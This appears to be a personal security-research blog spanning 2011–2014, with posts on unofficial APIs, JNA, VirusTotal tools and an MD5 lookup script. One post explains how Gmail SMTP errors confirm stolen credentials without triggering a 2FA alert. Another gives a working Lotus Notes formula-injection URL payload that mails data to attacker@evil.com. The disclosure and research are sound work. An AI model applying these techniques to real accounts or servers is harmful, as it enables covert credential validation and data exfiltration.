Friday, September 19, 2014

Google and two factor authentication

A nice feature about Google two factor authentication is allowing the user to be aware of potential account compromise. If a user captured your credentials and tried to access your email account through the usual Google web based portals you would get an SMS notification, obviously as part of the 2 factor authentication.
However, as a malicious user, you would want to just validate the credentials were correct and avoid the 2 factor authentication SMS. This got me thinking about other ways I could attempt to authenticate to the Google Services without the user being aware of potential credential compromise. Therefore validating the credentials and preventing the 2 factor authentication notification to the legitimate user so they weren't aware the credentials have been compromised.

I decided to test over SMTP. So just using Java, I attempted authentication over SMTP. If you authenticate with the invalid credentials you will get the following exception message:

Caused by: javax.mail.AuthenticationFailedException: 535-5.7.8 Username and Password not accepted. Learn more at
535 5.7.8 http://support.google.com/mail/bin/answer.py?answer=14257 wp7sm2528486wjc.12 - gsmtp

However, if you attempt to authenticate with the correct credentials but two factor authentication is configured on the account you will get the following exception and no notification will be sent to the end user:

Caused by: javax.mail.AuthenticationFailedException: 534-5.7.9 Application-specific password required. Learn more at
534 5.7.9 http://support.google.com/accounts/bin/answer.py?answer=185833 bj7sm2504496wjc.33 - gsmtp

Despite the exception being the same, you will notice there are differences in the error messages. Both are of course failed authenticated attempts but through subtle information leakage the latter tells me

  • The credentials for the account are correct
  • Two factor authentication is in use
  • The legitimate user does not receive a 2FA notification therefore being unaware the credentials have been compromised.


Tuesday, October 22, 2013

T-Mobile API


I've pulled apart and analysed the My T-Mobile client, and put together a Java API. You can use it to access all kinds of details from an account, such as call records and data usage. The project and code can be found at:

https://code.google.com/p/tmobile-api/

Enjoy!

Sunday, September 22, 2013

Nectar / Sainsburys unofficial API

I love taking reversing mobile applications and finding out more about the "hidden" and undocumented web services they talk to, then designing and building my own rich Java APIs to interact. The latest I took at a look at was the Nectar mobile application.

You can find my Nectar/Sainsburys Google Code project here.

Tuesday, July 3, 2012

NetBeans and Java Native Access

Accessing a native interface from Java is useful for a wide variety of reasons. The most common way to do this would be through the use of JNI. While it worked well, it did feel a little fiddly and heavy to get the job done. That was until the Java Native Access (JNA) platform came along. It does alot of the heavy lifting for you, allowing you to call native methods without doing any C/C++ development (unless you are writing your own dynamic library).

Below you can find my version of "HelloWorld" for JNA. This example calls the MessageBoxA function which is an export within User32.dll.

Firstly, create an interface for the native function:


1
2
3
4
5
6
7
8
package mywindows.java; 
       
import com.sun.jna.Library; 
       
public interface MyUser32 extends Library 
{ 
      public int MessageBoxA(int handle, String message, String title, int type);
}   

Then the invocation is straightforward:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
package jnaworld;

import com.sun.jna.Native;
import mywindows.java.MyUser32;

public class JNAWorld {

    static {
        if (System.getProperty("jna.nosys") == null) {
            System.out.println("[*] Set new system property");
            System.setProperty("jna.nosys", "true");
        }
    }

    public static void main(String[] args) {

        String mytext = "Hello World!";
        String mytitle = "Title bar";

        String libName = "c";
        if (System.getProperty("os.name").contains("Windows")) {
            libName = "user32"; //loading user32.dll on the system
        }

        // Loading dynamically the library
        MyUser32 user32 = (MyUser32) Native.loadLibrary(libName, MyUser32.class);
        user32.MessageBoxA(0, mytext, mytitle, 0);
    }
}


Note: The code included in the static initializer may not be needed. I have included it in this example incase people are doing their development from NetBeans. As NetBeans ships with a version of JNA you will want to ensure that the jar file that is used is the one you intend to ship with. If you include the static initializer it will prevent you running into the following error that you would otherwise encounter:


Exception in thread "main" java.lang.Error: 

There is an incompatible JNA native library installed on this system.
To resolve this issue you may do one of the following:
 - remove or uninstall the offending library
 - set the system property jna.nosys=true
 - set jna.boot.library.path to include the path to the version of the 
   jnidispatch library included with the JNA jar file you are using

Saturday, June 23, 2012

SABnzbd post processing script - virus scan

Using my VirusTotal API i've put together a post processing script for SABnzbd. The script will perform a recursive scan and perform a search on the VirusTotal site. Again, no file content is uploaded but instead submits the cryptographic hash (SHA256) to VirusTotal. The results will be displayed on the SABnzbd interface through the "View script log" window.

The Google code project can be found here, along with the download ready to add in your script folder.

Enjoy!

VirusTotal search / scan

The VirusTotal site has some pretty cool functionality. Their search feature allows you to search using various  terms. For example, you can search for malware results using cryptographic hashes. I've put together a Java API which allows developers to make use of this functionality. I've put all the code and API examples on my VirusTotal Google Code project page.

Saturday, December 24, 2011

Cracking MD5 with Google

It has been known for a long time now that Google can be used for all kinds of awesome things (Google query hacking etc), and hash cracking is one of them.

I thought I would share something I wrote last year to demonstrate how easy it is to crack MD5, just by using Google. This is easily adapted for use with other hashes, cracking SHA1 works well too. I've found the success rate to be extremely high. Enjoy :)

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
package md5crack;

import java.io.*;
import java.net.*;
import java.util.logging.*;
import org.apache.commons.codec.digest.DigestUtils;

/**
 *
 * @author Adam Boulton - Using Google to crack MD5
 */
public class MD5Crack {

    /**
     * @param args the command line arguments
     */
    public static void main(String[] args) {
        // TODO code application logic here

        if(args[0] == null || args[0].isEmpty())
        {
            System.out.println("-= Google MD5 Cracker =-");
            System.out.println("-= Adam Boulton - 2010 =- ");
            System.out.println("Usage: MD5crack <hash>");
        }
 
        String hash = args[0];
        String url = String.format("https://www.google.com/search?q=%s", hash);

        try {
            URL oracle = new URL(url);
            URLConnection conn = oracle.openConnection();

            //keep Google happy, otherwise connection refused.
            conn.setRequestProperty("user-agent", "Mozilla/5.0 Windows NT6.1 WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.63 Safari/535.7");

            BufferedReader in = new BufferedReader(
                    new InputStreamReader(
                    conn.getInputStream()));
            
            String inputLine;

            while ((inputLine = in.readLine()) != null) {
                String[] words = inputLine.split("\\s+");

                for (String word : words) {
                    String wordHash = DigestUtils.md5Hex(word);
                    if (wordHash.equals(hash)) {

                        System.out.println("[*] Found: " + word);
                        System.exit(0);
                    }
                }
            }
            
            System.out.println("[!] No results.");
            in.close();

        } catch (IOException ex) {
            Logger.getLogger(MD5Crack.class.getName()).log(Level.SEVERE, null, ex);
        }
    }
}

Saturday, November 19, 2011

New security vulnerability: Lotus Notes Formula Injection

From time to time, I get an opportunity to do some independent research. Something that has always particularly peaked my interest is Lotus Notes environments, both the administration and development platform. I feel what makes it an interesting environment is:

1. The focus is business applications
2. There has never been a significant focus from the IT security industry (Fortify doesn't even scan Lotus code)
3. My father happens to be a Lotus Notes Certified Developer.

These three points make an interesting recipe for security assessments.

Back in April 2010 I was having a usual tech talk with my dad about IT in general and software development practices. This is when I was introduced to the Domino Blog. Domino Blog is a Lotus Notes application offered by IBM as a weblog solution. It is generally intended for social media networking, allowing users to post topics and allow the general public to supply comments. This application is deployed within a Lotus Domino
environment and is utilized by a wide audience, from IBM employees to the general public.

My dad happened to have this setup on one of his servers, so it was all ready to break. To speed things up, we moved straight onto a secure code review of the application. The scope of tainted data was fairly limited, so it didn't take long to identify all the entry points, which makes the assessment much easier.
There are interesting functions in LotusScript, but one in particular is the 'Evaluate' function, which allows a Developer to build dynamic functionality by executing Lotus Notes Formula statements. For those who are familiar with other injection vulnerabilities (SQLi), I am sure the problem is becoming apparent.

It just so happens that in the Domino Blog there are Evaluate functions which are a sink for data received from HTTP requests without performing data encoding. To move straight onto an example payload it would look like this:


http://lotusnotesblogdomain.co.uk/blog.nsf/archive?openview&title=Motorbikes&type=cat&cat=");
@MailSend("attacker@evil.com";"";"";"Formula%20Injection";
"The%20email%body%belongs%here");
@IsText("


The payload above would force the Domino server to issue mail. As the Evaluate function supports wrapping of formula functions, it is trivial to start pulling data from the server and get it delivered to an email account.

An attacker simply requires the knowledge of how to correctly construct the statement to meet the requirements of the Evaluate function, and gain familiarity with the Formula language. As can be on the formula poster there is extremely powerful functionality that can make the payloads extremely interesting, and can certainly result in total compromise of the Lotus Notes server. I've appropriately coined this vulnerability Lotus Notes Formula Injection :)

Certainly add this to your list for web app or source code reviews of a Domino application.

Note: This was all responsibly disclosed to IBM in April 2010.

Update: 24/12/2011 - I thought it was pretty cool to see this picked up by WhiteHat Security and put in Jeremiah Grossman's blogspot 

Wednesday, July 20, 2011

JavaPayload project

This is not one to be missed! It is very impressive, Michael (Mihi) has clearly worked hard on this, kudos to him!

http://javapayload.sourceforge.net/

Monday, July 18, 2011

Insecure coding examples

A really useful list of test cases are available on the DHS National Cyber Security Division:

http://samate.nist.gov/SRD/view.php